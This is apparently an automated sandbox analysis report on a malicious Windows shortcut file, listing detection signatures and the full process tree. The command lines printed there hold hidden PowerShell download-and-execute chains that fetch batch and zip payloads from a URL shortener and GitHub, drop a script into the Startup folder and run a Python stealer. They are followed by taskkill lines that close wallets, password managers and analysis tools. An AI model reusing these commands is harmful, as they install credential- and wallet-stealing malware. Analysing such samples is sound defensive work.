Edit tour
Windows
Analysis Report
interior-design-villa-a23.lnk
Overview
General Information
Detection
MalLnk
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Powershell downloading file from url shortener site
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
Yara detected malicious lnk
AI detected suspicious sample
Excessive usage of taskkill to terminate processes
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Uses taskkill to terminate AV processes
Uses the Telegram API (likely for C&C communication)
Windows shortcut file (LNK) contains suspicious command line arguments
Connects to a URL shortener service
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 7084 cmdline:
"C:\WINDOW S\system32 \cmd.exe" /c "powers hell -Wind owStyle Hi dden -Comm and "Invok e-WebReque st -Uri 'h ttps://tin yurl.com/t t34x' -Out File 'C:\U sers\user\ AppData\Lo cal\Temp\t emp.bat'; Start-Proc ess -FileP ath 'C:\Us ers\user\A ppData\Loc al\Temp\te mp.bat' -W indowStyle Hidden"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7108 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6368 cmdline:
powershell -WindowSt yle Hidden -Command "Invoke-We bRequest - Uri 'https ://tinyurl .com/tt34x ' -OutFile 'C:\Users \user\AppD ata\Local\ Temp\temp. bat'; Star t-Process -FilePath 'C:\Users\ user\AppDa ta\Local\T emp\temp.b at' -Windo wStyle Hid den" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 1780 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\temp .bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7072 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //github.c om/ty9989/ u/raw/main /ud.bat', 'C:\Users\ user\AppDa ta\Roaming \\Microsof t\\Windows \\Start Me nu\\Progra ms\\Startu p\\Windows Secure.bat '); (New-O bject -Typ eName Syst em.Net.Web Client).Do wnloadFile ('https:// github.com /ty9989/z/ raw/main/T 3.zip', 'C :\\Users\\ Public\\Do cument.zip '); Add-Ty pe -Assemb lyName Sys tem.IO.Com pression.F ileSystem; [System.I O.Compress ion.ZipFil e]::Extrac tToDirecto ry('C:/Use rs/Public/ Document.z ip', 'C:/U sers/Publi c/Document '); Start- Sleep -Sec onds 1; C: \\Users\\P ublic\\Doc ument\\pyt hon.exe C: \Users\Pub lic\Docume nt\Lib\prt .py; Remov e-Item 'C: /Users/Pub lic/Docume nt.zip' -F orce" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2196 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - python.exe (PID: 5820 cmdline:
"C:\Users\ Public\Doc ument\pyth on.exe" C: \Users\Pub lic\Docume nt\Lib\prt .py MD5: A7F3026E4CF239F0A24A021751D17AE2) - taskkill.exe (PID: 4868 cmdline:
taskkill / F /IM Armo ryQt.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 3616 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 1608 cmdline:
taskkill / F /IM "Ato mic Wallet .exe" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 3916 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6300 cmdline:
taskkill / F /IM byte coin-gui.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6484 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6720 cmdline:
taskkill / F /IM Coin omi.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6744 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 3104 cmdline:
taskkill / F /IM Elem ent.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5024 cmdline:
taskkill / F /IM Exod us.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 792 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2312 cmdline:
taskkill / F /IM Guar da.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 5300 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6376 cmdline:
taskkill / F /IM KeeP assXC.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 5804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 1716 cmdline:
taskkill / F /IM Nord VPN.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 3544 cmdline:
taskkill / F /IM Open VPNConnect .exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 1188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 332 cmdline:
taskkill / F /IM seam onkey.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 944 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4176 cmdline:
taskkill / F /IM Sign al.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2164 cmdline:
taskkill / F /IM file zilla.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 5124 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7024 cmdline:
taskkill / F /IM file zilla-serv er-gui.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 1668 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2936 cmdline:
taskkill / F /IM keep assxc-prox y.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 3704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4416 cmdline:
taskkill / F /IM nord vpn-servic e.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 5688 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2332 cmdline:
taskkill / F /IM stea m.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 1228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4464 cmdline:
taskkill / F /IM wall etd.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 5284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2300 cmdline:
taskkill / F /IM wate rfox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 3808 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4480 cmdline:
taskkill / F /IM Disc ord.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6148 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6316 cmdline:
taskkill / F /IM Disc ordCanary. exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6340 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6608 cmdline:
taskkill / F /IM burp .exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6904 cmdline:
taskkill / F /IM Ethe real.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7136 cmdline:
taskkill / F /IM Ethe rApe.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6740 cmdline:
taskkill / F /IM fidd ler.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4496 cmdline:
taskkill / F /IM HTTP DebuggerSv c.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 512 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 1860 cmdline:
taskkill / F /IM HTTP DebuggerUI .exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6276 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 1608 cmdline:
taskkill / F /IM snpa .exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2412 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6488 cmdline:
taskkill / F /IM sola rwinds.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6996 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5652 cmdline:
taskkill / F /IM tcpd ump.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6744 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5232 cmdline:
taskkill / F /IM tele rik.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4428 cmdline:
taskkill / F /IM wire shark.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2892 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 412 cmdline:
taskkill / F /IM winp cap.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 2504 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5804 cmdline:
taskkill / F /IM tele gram.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 1988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MalLnk | Yara detected malicious lnk | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems): |